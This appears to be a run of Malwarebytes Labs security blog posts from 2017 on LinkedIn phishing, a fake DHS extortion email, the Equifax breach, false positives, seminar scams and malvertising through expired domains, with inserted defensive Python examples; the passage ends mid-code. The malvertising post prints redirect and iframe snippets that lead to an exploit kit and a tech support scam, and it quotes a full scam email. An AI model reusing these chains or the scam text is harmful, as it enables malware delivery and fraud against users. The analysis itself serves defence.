This email was sent via LinkedIn and carried a custom ‘Security Footer‘. LinkedIn sends messages “that include a security footer message with your name and professional headline to help you distinguish authentic LinkedIn emails from “phishing” email messages“, although it does point out that this is no guarantee the email is legitimate. In other words, the delivery channel can be trusted, but the content cannot. The same goes for phishing pages served over HTTPS, as this one is: the connection is encrypted, but the content itself is fraudulent.

Figure 4: The phishing email received via LinkedIn that includes the ‘Security Footer’

However, there’s a caveat here. To use InMail, you need a Premium account which comes at a hefty monthly cost. There’s a good article by KnowBe4 detailing a phishing attack using LinkedIn’s own platform via InMail. The researchers showed how trivial it is to create a free account, start connecting with people, and finally upgrade to a Premium account in order to start sending scams via InMail. But the conclusion of their research is that this particular attack would not scale well due to limited InMail credits, making the operation way too expensive.

That limitation does not apply here, since the crooks are not creating (and paying for) their own accounts but leveraging existing ones. They therefore have little reason to worry about burning InMail credits or tarnishing the victim’s reputation, so long as it lets them deliver their payload far and wide.

Personal security and its implications

We do not know how the LinkedIn accounts were compromised (malware, other phishing attacks, etc.) or how many were affected in this campaign. It’s also unclear whether the shortened URLs are unique per hacked account, although we think they might be. The user whose account was hacked had over 500 connections on LinkedIn and, based on Hootsuite‘s stats, we know 256 people clicked on the phishing link.

Figure 5: A Premium member account with 500+ connections caught sending phishing link

This kind of attack via social media is not new (we have seen hacked Skype and Facebook accounts send spam), but it reminds us how much harder it is to block malicious activity when it comes from long-standing, trusted user accounts, not to mention work acquaintances or relatives. It also makes such attacks more credible to potential victims and can lead to a snowball effect when victims become purveyors of phishing links themselves.

If your LinkedIn account gets compromised, immediately review its settings: change your password, enable two-step verification (instructions here), and sign out of any active sessions you don’t recognize. Additionally, post a quick update on your timeline letting your contacts know you were hacked and that any previous message you may have sent with links should be carefully vetted.

We’d like to thank @acfou for sharing a sample of this campaign with us.

Indicators of compromise

Phishing message:

I have just shared a document with you using GoogleDoc Drive, View shared document[]

Redirection and phishing page:

ow[.]ly/qmxf30eWLyN
dgocs[.]
dgocs[.]
cakrabuanacsbali[.]com/wp-rxz/index.php

Decoy Google Docs Wells Fargo file:

The post Compromised LinkedIn accounts used to send phishing links via private message and InMail appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (September 4 – September 10)

Malware Bytes Security - Mon, 09/11/2017 - 3:53pm

Last week, we looked into expired domain names being used for malvertising, delved into dubious Facebook apps, and checked out Chinese seminar scams. We also explained the whys and wherefores of false positives, explained what Google is doing with HTTPS, warned you away from a fake DHS email, and outlined some early information about the Equifax breach.



Stay safe!

Malwarebytes Labs Team



The post A week in security (September 4 – September 10) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Fake DHS email – “Give us $350 in the next 24 hours”

Malware Bytes Security - Fri, 09/08/2017 - 11:00am

Who likes threats?

Nobody, as it turns out. That hasn’t stopped scammers from jumping on the menacing email train – next stop, your inbox.

Every now and then, we see the 419 “Hitman deployed to kill you” missive doing the rounds. On a similar threatening note, we have a fake DHS notification telling you to pay a $350 fee within 24 hours – or else.

The email reads as follows (we’ve put the meatiest threats in bolded text):


You are to contact the U.S. Department of Homeland Security (DHS) Washington, D.C to obtain your Clearance Certificate, find below their contact information:

Contact Person: Stevan Bunnell
General Counsel
U.S. Department of Homeland Security (DHS)
Washington DC Mailing Address U.S. Department of Homeland Security Washington, D.C. 20528.

Ensure you contact (DHS) with your Full Name, Address and phone number/cell number.
Contact the DHS via Email with the information above immediately, once you contact them I will get back to you or else I will have an agent come visit you at home for questioning.

Furthermore, be advised that according to the United State Law together with the Federal Bureau of Investigation rules and regulations, you are to obtain the document from the DHS. Also note that you are to take care of the cost of the Clearance Certificate, which will be issued in your name. Due to the content of the Clearance Certificate and how important and secured the document is, you as the beneficiary will send the DHS the sum of $350 Dollars only for the issuing of the Clearance Certificate. That is the lay down rules for the DHS to release such sensitive document; DHS will issue you the authentic and original copy of the Clearance Certificate with a seal on it for verification and approval.

You are hereby advised to Contact them through the email address above to make an inquiry concerning how you will send the official fee to them. Note that you are to observe this immediately, if you really want your funds to be credited to your personal bank account and to avoid any legal battle with the security operatives over this matter. We have already informed the DHS about the present situation go ahead and contact them immediately.
Your funds are under our custody and will not be released to you unless the required document is confirmed, after that the fund will be release to you immediately without any delay.

NOTE: We have asked for the above document to make available the most completed and up-to date records possible for no criminal justice purposes. The documents will clarify the intensity of this fund; exonerate it from money laundry, scam and terrorism.

WARNING: Failure to provide the above requirement in the next 24 hours, legal action will be taken immediately by arresting and detaining you as soon as international court of justice issues a warrant of arrest, if you are found guilty, you will be jailed as terrorism, drug trafficking and money laundering is a serious problem in our community today and the world at large. The F.B.I will not stop at any length in tracking down and prosecuting any criminal who indulges in this criminal act. Nobody is above the law and the law is not a respecter of anybody. We presume you are law abiding and would not want to have scuffles with the authority, in and outside of the United States.

We are charged with the responsibility of implementing legal norms and our authority is irrevocable so don’t dare dispute our instruction, just act as instructed. The person you know will not help you in this matter rather abide by this instruction.

Note: You are to contact DHS with your full names, phone number/cell number and full address via the email which I stated above immediately, for the processing of your Clearance Certificate within the next 48 hours.

Faithfully Yours
Thomas Dinapoli
Office of the New York State Comptroller

That’s quite the barrage of “pay up”, and could well scare some people into handing over whatever the scammers ask for (and we’d be surprised if they stop at the $350). Should you receive one of these emails, simply delete it and go on with your day – nobody is coming to collect money from you.


Christopher Boyd


The post Fake DHS email – “Give us $350 in the next 24 hours” appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Equifax breach: What you need to know

Malware Bytes Security - Fri, 09/08/2017 - 3:02am

On July 29, 2017, Equifax discovered that attackers had gained unauthorized access to private data belonging to an estimated 143 million Americans by exploiting a vulnerability in a website application. It is unknown at this point whether said vulnerability was a zero-day or had already been patched. The former would indicate that other companies could have also been attacked, while the latter would reflect on Equifax’s overall security posture.

According to Equifax, online criminals maintained their presence from mid-May through July 2017 and had access to:

  • Names
  • Social Security numbers
  • Birth dates
  • Addresses
  • Driver’s license numbers (in some cases)
  • Credit card numbers (for approx. 209,000 U.S. consumers)

It also said that some personal information for certain UK and Canadian residents was part of this breach.

This is obviously bad news for consumers, and it will only deepen their distrust of corporations that collect and store their data. It is also a reminder that there are ways to be proactive: you can exercise your right to access your information and put restrictions in place that make identity theft harder.

Equifax is offering free identity theft protection and credit file monitoring to all of its U.S. customers while it continues to investigate the intrusion together with a private firm and law enforcement. More information about this breach and how to apply for ID theft protection can be found on the website Equifax has just set up.

The post Equifax breach: What you need to know appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Google reminds website owners to move to HTTPS before October deadline

Malware Bytes Security - Thu, 09/07/2017 - 11:36am

With the release of Chrome v62 in less than three months, Google will begin marking non-HTTPS pages with text input fields (contact forms, search bars and the like) and all HTTP websites viewed in Incognito mode as “NOT SECURE” in the address bar. The company began sending warning emails to site owners in August, as a follow-up to an April announcement by Emily Schechter, Product Manager on the Chrome Security Team.

Google began marking sites in Chrome v56, released in January of this year, targeting HTTP pages that collect user passwords and credit card details.

To secure the information exchanged between visitors and the web server, site owners must obtain a certificate and serve their site over HTTPS. Failing to do so is risky for both parties: anything sent in clear text can be read, and altered, by anyone sitting on the network path between the browser and the server.

Ms. Schechter also provided website owners with a handy guide on how to enable HTTPS on their servers. An additional guideline on how to avoid the “NOT SECURE” warning on Chrome is also available for web developers.

Looking at the way things are panning out, we can be confident that HTTPS will be the norm in no time. However, this doesn’t mean that all sites using SSL certificates can and should be trusted.

Google intended the marking of insecure sites to help separate phishing sites from legitimate ones, as Help Net Security noted in an article. Unfortunately, the arrival of browser versions capable of flagging HTTP sites was promptly followed by more phishing sites using HTTPS. We have been seeing examples of this in the wild as well, the latest being an Apple phishing campaign.

Discerning phishing pages from real ones has become more challenging than ever. This is why users should familiarize themselves with other signs that they might be on a phishing page, apart from whether the site has a certificate. Fortunately, users don’t have to look far from the address bar to double-check that they’re on the right page before entering credentials or banking details. Keep the following in mind when scrutinizing a URL and the elements around it:

  • Look for characters in the URL made to look like another letter or number, or extra letters or numbers slipped into the name. For example, two ‘v’ characters side by side look like a ‘w’, and the lowercase ‘l’ in “example” can be swapped for the digit one. These look-alike swaps are a form of typosquatting, often called a homoglyph or homograph attack.
  • Look for an Extended Validation certificate (EV SSL). You know a trusted website has one when you see the company name beside the URL, as in the UK PayPal address shown below. Not all sites with SSL have this, unfortunately, but some of the trusted brands online already use EV SSL, such as Bank of America, eBay, Apple, and Microsoft.

Lastly, be aware that phishers may use a free SSL certificate in their campaign to make it appear legitimate. They may also hijack sites that already have SSL in place, adding more to the veil of legitimacy they want to attain.
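The look-alike checks in the first bullet can be automated. The Python below is an added example, not code from the original post or from Google or Malwarebytes: it collapses the substitutions described above (two v’s for a w, r+n for an m, a digit one for an l, and a short, assumed list of Cyrillic and Greek letters that render like Latin ones, including those hidden behind punycode xn-- labels) and reports which trusted domain a hostname resembles without actually being under it. The trusted list and the confusable tables are assumptions for the example; a production check would use the full Unicode confusables data.

```python
from typing import Dict, Iterable, Optional

# Look-alike substitutions seen in phishing hostnames. Two-character entries (two v's for
# a w, r+n for an m) are collapsed before single characters so "vvvvw" becomes "www".
# Assumed, deliberately short table for this example.
ASCII_CONFUSABLES: Dict[str, str] = {
    "vv": "w", "rn": "m",
    "0": "o", "1": "l", "3": "e", "5": "s",
}

# Cyrillic and Greek letters whose glyphs match Latin ones. Assumed short list; the full
# Unicode confusables table is far longer.
SCRIPT_CONFUSABLES: Dict[str, str] = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u04cf": "l", "\u03bf": "o",
}


def displayed_host(host: str) -> str:
    """Lower-case a hostname and, if it carries punycode (xn--) labels, decode them to
    the Unicode characters a browser would render in the address bar."""
    host = host.strip().lower().rstrip(".")
    if "xn--" not in host:
        return host
    try:
        return host.encode("ascii").decode("idna")
    except UnicodeError:
        return host  # malformed label: keep the raw string


def skeleton(host: str) -> str:
    """Reduce a hostname to the Latin string it is trying to resemble.

    Note the cost of the digit mappings: a legitimate "s1.example.com" also skeletonizes
    to "sl.example.com"; this only matters if that happens to collide with a trusted name.
    """
    s = "".join(SCRIPT_CONFUSABLES.get(ch, ch) for ch in displayed_host(host))
    for pair, repl in ASCII_CONFUSABLES.items():
        if len(pair) == 2:
            s = s.replace(pair, repl)
    for ch, repl in ASCII_CONFUSABLES.items():
        if len(ch) == 1:
            s = s.replace(ch, repl)
    return s


def lookalike_of(host: str, trusted: Iterable[str]) -> Optional[str]:
    """Return the trusted domain that `host` impersonates, or None.

    A host is a look-alike when it is not a trusted domain (or a genuine subdomain of
    one) but either its skeleton is, or it buries a trusted name inside the subdomain
    part of an unrelated registrable domain (paypal.com.login-check.example).
    """
    shown = displayed_host(host)
    sk = skeleton(host)
    trusted = [t.lower() for t in trusted]
    for t in trusted:
        if shown == t or shown.endswith("." + t):
            return None  # genuinely under the trusted zone
    for t in trusted:
        if sk == t or sk.endswith("." + t):
            return t  # looks like t, is not t
        if ("." + t + ".") in ("." + sk):
            return t  # trusted name used as a subdomain label
    return None


if __name__ == "__main__":
    # Assumed allow-list for the demonstration.
    trusted = ["example.com", "microsoft.com", "paypal.com", "apple.com"]
    for h in ("examp1e.com", "rnicrosoft.com", "www.paypal.com",
              "paypal.com.login-check.example", "\u0430pple.com".encode("idna").decode("ascii")):
        print(f"{h:40s} -> {lookalike_of(h, trusted)}")
```

The punycode step matters in practice: the address bar may show the Cyrillic form while the certificate and DNS see the xn-- label, so check the form the user actually sees.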

The Malwarebytes Labs

The post Google reminds website owners to move to HTTPS before October deadline appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Explained: False positives

Malware Bytes Security - Thu, 09/07/2017 - 11:00am

What are false positives?

False positive, sometimes abbreviated f/p, is the term used in cybersecurity for a file or setting that has been flagged as malicious when it is not.

In statistics, false positives are called Type I errors: a test checks for a particular condition and wrongly returns an affirmative (positive) result. The opposite is a false negative, or Type II error: the test concludes the condition is absent when, in fact, it is present. In this blog post, we focus on false positives in cybersecurity, but note that false negatives in this field are commonly referred to as “misses”: malicious files or malicious behavior that the scanner or protection software did not detect.

Possible causes of false positives

The most common causes of false positives are:

  • Heuristics: decisions are made on minimal bits of information
  • Behavioral analysis: decisions are made based on behavior, and the legitimate file shows behavior that is usually considered malicious
  • Machine learning: sometimes we see the effects of “garbage in, garbage out,” or more politely put, “training did not take certain situations into account.”

Let’s give some examples of these causes.

An example of a heuristic rule: if a file claims to be from Microsoft but is not signed with a Microsoft certificate, assume it has malicious intent. A false positive occurs in the rare case where a legitimate Microsoft file simply was never signed.

One behavioral indicator for ransomware is a program deleting Volume Shadow Copies. Some ransomware families do this so the victim cannot restore files from them. But a disk cleanup utility that deletes old shadow copies does exactly the same thing, and could be flagged for malicious activity, right?

Machine learning is done by feeding the system vast amounts of training data. Mistakes or ambiguities in the training data can lead to errors in the detections.

Designing detection rules for yet-unknown malicious files or behavior is always a balance of trying to cover as many of them as possible without triggering any false positives and, understandably, this can go wrong sometimes.
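To make that balance concrete, here is a small scoring harness, added as an example and not Malwarebytes’ detection code. It encodes the two heuristics described above as rules, runs them over a constructed set of labelled samples (not real files or telemetry), and reports the confusion matrix, so you can see how tightening the shadow-copy rule removes the cleanup-utility false positive while the unsigned-Microsoft rule keeps its rare one and one sample is still missed.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Sequence, Tuple


@dataclass(frozen=True)
class Sample:
    name: str
    claims_vendor: Optional[str]   # vendor named in the file's version information
    signer: Optional[str]          # subject of the Authenticode signature, if any
    commands: Tuple[str, ...]      # child processes observed in a sandbox run
    encrypts_user_files: bool      # observed mass rewrite of user documents
    malicious: bool                # ground-truth label from an analyst


# Constructed sample set for the example; these are not real files or real telemetry.
SAMPLES: List[Sample] = [
    Sample("notepad.exe", "Microsoft", "Microsoft", (), False, False),
    Sample("mscfg_tool.exe", "Microsoft", None, (), False, False),          # vendor forgot to sign
    Sample("diskcleaner.exe", "CleanSoft", "CleanSoft",
           ("vssadmin.exe delete shadows /all /quiet",), False, False),     # legitimate cleanup tool
    Sample("photo_editor.exe", "PixelCo", "PixelCo", (), False, False),
    Sample("invoice.exe", "Microsoft", None, (), False, True),              # trojan posing as Microsoft
    Sample("locker.exe", None, None,
           ("vssadmin.exe delete shadows /all /quiet",), True, True),       # ransomware
    Sample("stealer.exe", None, None, ("cmd.exe /c whoami",), False, True), # neither rule sees it
]

Rule = Callable[[Sample], bool]


def claims_microsoft_but_unsigned(s: Sample) -> bool:
    """Heuristic from the post: claims Microsoft, not signed by Microsoft."""
    return s.claims_vendor == "Microsoft" and s.signer != "Microsoft"


def deletes_shadow_copies(s: Sample) -> bool:
    """Behavioral rule from the post: any vssadmin shadow-copy deletion."""
    return any("vssadmin" in c.lower() and "delete shadows" in c.lower() for c in s.commands)


def deletes_shadow_copies_and_encrypts(s: Sample) -> bool:
    """Tightened rule: shadow-copy deletion alone is ambiguous; combined with mass
    encryption of user files it is not."""
    return deletes_shadow_copies(s) and s.encrypts_user_files


def evaluate(rules: Sequence[Rule], samples: Sequence[Sample]) -> Dict[str, object]:
    """Score a rule set against labelled samples: confusion matrix, rates, and the names
    of the false positives (flagged but benign) and misses (malicious, not flagged)."""
    counts = {"tp": 0, "fp": 0, "fn": 0, "tn": 0}
    false_positives: List[str] = []
    misses: List[str] = []
    for s in samples:
        flagged = any(rule(s) for rule in rules)
        if flagged and s.malicious:
            counts["tp"] += 1
        elif flagged:
            counts["fp"] += 1
            false_positives.append(s.name)
        elif s.malicious:
            counts["fn"] += 1
            misses.append(s.name)
        else:
            counts["tn"] += 1
    benign = counts["fp"] + counts["tn"]
    malicious = counts["tp"] + counts["fn"]
    return {
        **counts,
        "false_positive_rate": counts["fp"] / benign if benign else 0.0,
        "detection_rate": counts["tp"] / malicious if malicious else 0.0,
        "false_positives": false_positives,
        "misses": misses,
    }


LOOSE_RULES: List[Rule] = [claims_microsoft_but_unsigned, deletes_shadow_copies]
TIGHT_RULES: List[Rule] = [claims_microsoft_but_unsigned, deletes_shadow_copies_and_encrypts]

if __name__ == "__main__":
    for label, rules in (("loose", LOOSE_RULES), ("tight", TIGHT_RULES)):
        r = evaluate(rules, SAMPLES)
        print(f"{label}: tp={r['tp']} fp={r['fp']} fn={r['fn']} tn={r['tn']} "
              f"fpr={r['false_positive_rate']:.2f} fps={r['false_positives']} misses={r['misses']}")
```

Tightening a rule is not free: in this set the miss stays a miss, and any sample that deletes shadow copies without also encrypting files would now slip past. That trade is exactly the judgment call the paragraph above describes.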

Fun facts

A much less common cause for false detections is deliberate false positives. The most well-known false positive is the EICAR test file, a computer file that was developed by the European Institute for Computer Antivirus Research to verify the response of antivirus programs without having to use real malware. Note that Malwarebytes for Windows does not detect the EICAR file and Malwarebytes for Mac only detects it under exceptional circumstances. This is by design.

History has also given us deliberate false positives planted to test whether an anti-malware vendor was copying its competitors’ detections.


False positives are alerts on files or behavior flagged as malicious when, in fact, no malicious intent was present. They are caused by rules written to catch as many malicious events as possible, which sometimes overreach and pick up something legitimate.


Pieter Arntz

The post Explained: False positives appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Nigerian scams without the Nigerians

Malware Bytes Security - Wed, 09/06/2017 - 7:00pm

Users in English speaking countries are quite familiar with the Nigerian scam: an important guy in Nigeria needs your help getting his money out of the country and if you assist with some transaction fees, a chunk of his fortune could be yours. But what about non-English speaking countries? What forms the baseline level of internet crap? Today we’re going to look at the Chinese version – the seminar scam.

Step 1: the pitch

This pitch is actually more common via SMS, presumably because spam filtering on mobile is limited. The subject line references upcoming training in generic business skills like project management, bookkeeping, or HR.

项目领导力总结—8月23-24日学吧 《项目领导力》 (roughly: “Project leadership summary, come and learn on August 23-24: ‘Project Leadership’”)

This particular message we received is advertising a “project leadership” seminar.

These pitches vary in topic, generally staying within vague business subjects, and are so common that almost any Chinese internet user is likely to see one eventually. Searching the provided mobile number turns up nothing but more spam, and the QQ number isn’t registered to any notable groups. The accounts associated with these emails are generally used exclusively for the scam.

Step 2: the form

Naturally, we want to attend said seminar, so we sent a response asking how to register. Within a day, the scammer responded:

He references a file with a detailed agenda as well as registration info. He also wants our Weixin (WeChat), so that we can “maintain a long-term relationship.”

The attached, clean file includes a “registration form” requiring the following:

  • Company name, address, and bank with account number
  • Attendee’s name, phone number, and email addresses.

This is the point where generic business spam edges closer to malicious. Scammers take the target’s money, and their PII as well, for use in further scams. Anyone who actually fills this out will be signed up for every spammer’s list in perpetuity.

Step 3: the payment

Just in case we were wondering about receipts, the form lets us know that we can pick up our tickets the day of the “training,” and then provides a bank account that we can wire money directly to.

Given that we didn’t pay the guy and we did not go to Shanghai to check out the “venue”, there’s still a possibility that this may be legit. That said:

  • We responded from a free Chinese webmail, offering no company affiliation. This did not faze the scammer.
  • There are estimates that up to 40% of Chinese private educational institutions (training centers, job skills, etc.) are unlicensed and/or fraudulent
  • The price of this training is 1800 yuan, which makes up a significant portion of the average Chinese monthly wage of 2300 yuan.

The odds are fairly good that there either isn’t any training, or the venue specified actually hosts a pyramid scheme that will train members on how to recruit new marks. Much like a Nigerian scam, this form of advance fee fraud is very common and familiar. Its familiarity is actually a plus, as anyone who responds to such an obvious pitch more or less preselects themselves as a vulnerable and easily manipulated target. And similar to the 419 scam’s exploitation of underdeveloped financial institutions in Nigeria, the seminar scam exploits a void in regulation in the Chinese adult education market. Seminar scams are a great reminder that regardless of the language or culture used, scammers will exploit the same weaknesses online, wherever they are.


So how do you defend yourself against seminar scams? First, don’t respond to the email and definitely don’t disclose any personal information. But also ask yourself, “Have I heard of this institution? Does it have a local reputation?” As well as “What reputable organization advertises in this way?” Probably not too many. Stay safe: be vigilant.

The post Nigerian scams without the Nigerians appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Facebook worries: I didn’t post that

Malware Bytes Security - Wed, 09/06/2017 - 11:00am

My assumption is that most Facebook users don’t look at their own profile often. By your own profile, I mean the timeline that shows up when you click your own name or avatar in the Facebook menu.

That’s because we think we know exactly what is posted there, so why bother to look at it? After all, isn’t that supposed to be all the stuff that we posted ourselves?

The disorientation you feel when you find something you are sure you didn’t post gets even worse if you also notice messages sent from your Facebook Messenger account that you know you never sent. In short, there can be discrepancies between what you did and what actually shows up, and that is what this blog post is about.

How do posts end up on your timeline that you didn’t post?

There are three main reasons that might be of some concern:

  1. Someone or something else has access to your Facebook account
  2. A Facebook app has the authorization to post on your timeline
  3. An active script or browser extension can post on your behalf

In all these cases, there is no immediate reason to worry as long as you know about it and trust the person, app, script, or extension that has access or authorization.

Authorized apps

We have seen it in the past, and I bet there are still active apps being spread among Facebook users by pretending to be spectacular videos. You may remember “Man found inside Shark” and similar sensational posts, which try to trick you into downloading malware or installing a malicious app.

To check whether an app has the ability to post on your timeline, click on Settings:

On the left-hand side, click on Apps and select any app that doesn’t look familiar or trustworthy. You can see whether they can post on your timeline by looking at their permissions. If they have the authorization to post on your timeline, it will look like this:

Delete apps you don’t trust or no longer use by clicking on the X that shows up when you hover over an app with your mouse pointer in the Apps menu.

Scripts posting on your behalf

It is possible that an active script (or program) is using your session while you have Facebook open in your browser. The script does not need to log in; it simply rides on the fact that you already did, whether you logged in actively or relied on a cookie set in an earlier session.

These scripts can hide in your browser cache or in the shortcut you use to open Facebook. Facebook’s Help page has localized, browser-specific instructions for clearing your cache. If you suspect your shortcuts have been altered, bypass them by typing Facebook’s address into the browser’s address bar yourself. Once you are sure the shortcuts were altered, you can find methods for cleaning browser shortcuts on our forums.

Browser extensions could be responsible for this similar behavior. They can be removed following these procedures:

  • Internet Explorer: Tools (gear icon) > Manage add-ons > Toolbars and Extensions > Select the one(s) you don’t trust one by one and click “Disable”
  • Firefox: Menu (horizontal stripes) > Add-ons > click on “Disable” behind the ones you don’t trust or don’t recall installing.
  • Chrome: Menu (3 dots) > More Tools > Extensions > Uncheck “Enabled” behind the ones you don’t trust or don’t recall installing.
  • Opera: click the Opera icon > Extensions > Extension Manager > click on Disable below the ones you don’t trust or don’t recall installing.

Stolen credentials

I’m covering this last for a reason: the advice here applies not only when you know that someone or something you didn’t authorize posted on your behalf. Whether you have confirmed or merely suspect that something has been posting without your knowledge, including through one of the other routes (scripts, rogue apps), change your password and enable 2FA if you haven’t already. Even if you have no idea who was responsible, lock them out before they abuse their access to your account any further. Do this even after you have identified and removed the app or script that was used: it may also have harvested your login credentials and sent them to the threat actors.


What to do when you find posts in your name on Facebook which you did not post:

  1. Try to find out if there is a suspicious or unsolicited Facebook app active on your list that has posting authorization.
  2. Clear the cache of the browser that you use to access Facebook and the shortcuts you use to open Facebook.
  3. Change your password and consider enabling 2FA.



Pieter Arntz

The post Facebook worries: I didn’t post that appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Expired domain names and malvertising

Malware Bytes Security - Tue, 09/05/2017 - 11:00am

In Q1 and Q2 of 2017, we noticed a sharp decline in drive-by downloads coming from compromised websites. The campaigns of the past are either gone (Pseudo Darkleech) or have changed focus (EITest using social engineering techniques).

Malvertising, which has remained steady and is currently the main driving force behind some of the most common malware and scam distribution operations, stems not only from various publishers but also from ‘abandoned’ websites. These domains once served a legitimate purpose but were never renewed by their owners and fell into the hands of actors looking to make a quick profit through questionable practices.

In this post, we take a look at how malicious redirections from expired domains work and what kind of traffic they lead to.

The life, death, and resurrection of a domain name

Most issues when it comes to web security don’t usually come from the platforms themselves but from the people that run them or from properties that have simply been relinquished. The folks over at Sucuri have written about this extensively and in a recent post, they showed how expired domains and outdated plugins in popular CMS were a deadly mix, resulting in malicious redirects.

Here is an example: oezelotel[.]com, first registered on 03/10/2014, once advertised various hotels, was wiped in 2016, and eventually got parked because its domain name registration was never renewed.

Figure 1: Evolution of a website over time and its eventual expired domain name

New owner, clear motive

A historical WHOIS on the parked domain, courtesy of Hyas’ Comox, shows that on June 4, 2017, the domain name changed hands from its original owner to a new registrant. This is also when the site changed hosting (moving from a Germany-based server to a US one) and began exhibiting its malicious behavior.

A cursory review of other properties owned by the same registrant indicates a penchant for going after expired domains and monetizing them via dubious ad networks. DomainTools has over 23,000 records belonging to that same email address.

Malvertising roulette

You might think a non-existent site is harmless, but this couldn’t be further from the truth. Abandoned or forgotten domains are often registered and ‘parked’ to generate low-quality traffic (i.e. spammy links), as described in yet another blog post from Sucuri, and it is a real, and lucrative, business model.

We observed different types of traffic depending on the visitor’s user agent, ranging from bogus surveys to more nefarious activity such as drive-by attacks and tech support scams. Note that the following examples did not require users to click on any link: simply visiting the site triggered an automatic redirection.

RIG EK flow:

Figure 2: RIG exploit kit infection chain via the Fobos campaign that delivers the Bunitu Trojan.

oezelotel[.]com (parked site) -> xml1.limeclick[.]com

  <html><head><title>Loading</title></head>
  <body><script>location.href='http://xml1.limeclick[.]com/click?i=SXRzS*SmiP4_0';</script></body></html>

xml1.limeclick[.]com -> bingfreegames3[.]info

  <iframe frameborder='0' id='291733' src='http://212kjhguihkhbvd[.]cf/ssl/index.php?ps=49506017476' width='313' height='313' dir='0'></iframe>

212kjhguihkhbvd[.]cf -> (RIG EK landing)

  <iframe id="91130118" width=278 double="1" height=278 src="http://188.225.27[.]234/?NTkwNTc2&mano={redacted}"></iframe>

Tech Support Scam (TSS) flow:

Figure 3: Redirection to tech support scam via blobar[.]org

oezelotel[.]com (parked site) -> bougainvillaeabuffeting[.]com

  <html><head><title>Loading</title></head>
  <body><script>location.href='http://bougainvillaeabuffeting[.]com/d/r5t9b73131?rtb={redacted}&';</script></body></html>

bougainvillaeabuffeting[.]com -> blobar[.]org

  document.write('<META http-equiv="refresh" content="0;url='+u+'">');
  </SCRIPT><NOSCRIPT><META http-equiv="refresh" content="0;url={redacted}&"></NOSCRIPT>
  <META name="referrer" content="no-referrer">

blobar[.]org -> www.alrtsyscalling[.]cf (TSS landing)

  Location: https://www.alrtsyscalling[.]cf/call-microsoft-support-at-1-855-633-1666

Figure 4: Browser locker serving a tech support scam page (IP address is hard coded in picture)
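To make chains like the two above easier to review from captured traffic, here is an added Python example; it is not code from the original post or from Malwarebytes. It pulls the next hop out of each captured response using the four mechanisms seen in the flows (an HTTP 3xx Location header, a JavaScript location.href assignment, an injected iframe, and a meta refresh) and flags any page that sets a no-referrer policy, as the blobar[.]org hop does to hide where the visitor came from. The captured responses are constructed to mirror the chains above: the hop from xml1.limeclick[.]com to bingfreegames3[.]info is assumed to be an HTTP 302 (the post does not show it), and query tokens and the final landing path are placeholders.

```python
import re
from urllib.parse import urlparse

# Redirect mechanisms observed in the chains, tried in this order on a 200 body.
# Each regex captures the next-hop URL.
BODY_REDIRECTS = [
    ("script-location", re.compile(r"location\.href\s*=\s*['\"]([^'\"]+)['\"]", re.I)),
    ("iframe", re.compile(r"<iframe[^>]*?\ssrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)),
    ("meta-refresh", re.compile(
        r"<meta[^>]*http-equiv=['\"]?refresh['\"]?[^>]*content=['\"]\s*\d+\s*;\s*url=([^'\">]+)",
        re.I)),
]
# A page that strips the Referer hides the previous hop from the next server's logs.
NO_REFERRER = re.compile(r"<meta[^>]*name=['\"]?referrer['\"]?[^>]*content=['\"]?no-referrer", re.I)


def refang_host(url):
    """Turn a defanged URL (example[.]com) back into a plain hostname for comparison."""
    return urlparse(url.replace("[.]", ".")).hostname


def next_hop(status, headers, body):
    """Return (mechanism, target_url) for one captured response, or None if it is terminal."""
    if 300 <= status < 400 and headers.get("Location"):
        return ("http-3xx", headers["Location"])
    for name, pattern in BODY_REDIRECTS:
        match = pattern.search(body)
        if match:
            return (name, match.group(1))
    return None


def hides_referrer(body):
    """True when the page sets a no-referrer policy before redirecting."""
    return NO_REFERRER.search(body) is not None


def reconstruct_chain(hops):
    """Walk (url, status, headers, body) captures and list each hop as
    (from_host, mechanism, to_host, referrer_hidden)."""
    chain = []
    for url, status, headers, body in hops:
        hop = next_hop(status, headers, body)
        if hop is None:
            continue  # terminal page (landing), nothing further to follow
        mechanism, target = hop
        chain.append((refang_host(url), mechanism, refang_host(target), hides_referrer(body)))
    return chain


# Constructed captures mirroring the RIG EK chain; tokens are placeholders and the
# limeclick -> bingfreegames3 hop is assumed to be a 302.
RIG_CAPTURE = [
    ("http://oezelotel[.]com/", 200, {},
     "<html><head><title>Loading</title></head><body><script>"
     "location.href='http://xml1.limeclick[.]com/click?i=TOKEN';</script></body></html>"),
    ("http://xml1.limeclick[.]com/click?i=TOKEN", 302,
     {"Location": "http://bingfreegames3[.]info/?r=TOKEN"}, ""),
    ("http://bingfreegames3[.]info/?r=TOKEN", 200, {},
     "<iframe frameborder='0' id='291733' src='http://212kjhguihkhbvd[.]cf/ssl/index.php?ps=1' "
     "width='313' height='313' dir='0'></iframe>"),
    ("http://212kjhguihkhbvd[.]cf/ssl/index.php?ps=1", 200, {},
     '<iframe id="91130118" width=278 height=278 src="http://188.225.27[.]234/?REDACTED"></iframe>'),
    ("http://188.225.27[.]234/?REDACTED", 200, {}, "<html><body>landing</body></html>"),
]

# Constructed captures mirroring the tech support scam chain; the landing path is a placeholder.
TSS_CAPTURE = [
    ("http://oezelotel[.]com/", 200, {},
     "<html><head><title>Loading</title></head><body><script>"
     "location.href='http://bougainvillaeabuffeting[.]com/d/r5t9b73131?rtb=REDACTED&';"
     "</script></body></html>"),
    ("http://bougainvillaeabuffeting[.]com/d/r5t9b73131?rtb=REDACTED&", 200, {},
     "<script>var u='http://blobar[.]org/?rtb=REDACTED&';"
     "document.write('<META http-equiv=\"refresh\" content=\"0;url='+u+'\">');</script>"
     "<NOSCRIPT><META http-equiv=\"refresh\" content=\"0;url=http://blobar[.]org/?rtb=REDACTED&\"></NOSCRIPT>"
     "<META name=\"referrer\" content=\"no-referrer\">"),
    ("http://blobar[.]org/?rtb=REDACTED&", 302,
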